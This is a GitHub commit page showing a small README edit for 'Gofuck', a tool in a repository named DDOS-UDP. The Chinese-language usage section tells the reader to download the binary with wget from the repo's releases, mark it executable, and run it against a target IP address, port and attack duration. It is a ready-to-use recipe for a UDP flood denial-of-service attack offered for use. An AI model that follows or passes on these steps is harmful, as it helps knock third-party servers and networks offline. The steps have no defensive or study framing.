Update README.md

This commit is contained in:
RandyColin 2024-01-15 22:26:15 +08:00 committed by GitHub
parent 3ee554dbaa
commit d2ee6e803b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -3,11 +3,8 @@ Gofuck 使用文档:
使用前使用 chmod +x Gofuck 赋予执行权限。 使用前使用 chmod +x Gofuck 赋予执行权限。
使用参数: 使用参数:
```shell
```shell ```shell
wget https://github.com/randycolin/DDOS-UDP/releases/download/v.1.0.0/Gofuck wget https://github.com/randycolin/DDOS-UDP/releases/download/v.1.0.0/Gofuck
chmod +x Gofuck chmod +x Gofuck
./Gofuck <IP地址> <端口> <攻击持续时间> ./Gofuck <IP地址> <端口> <攻击持续时间>
``` ```
```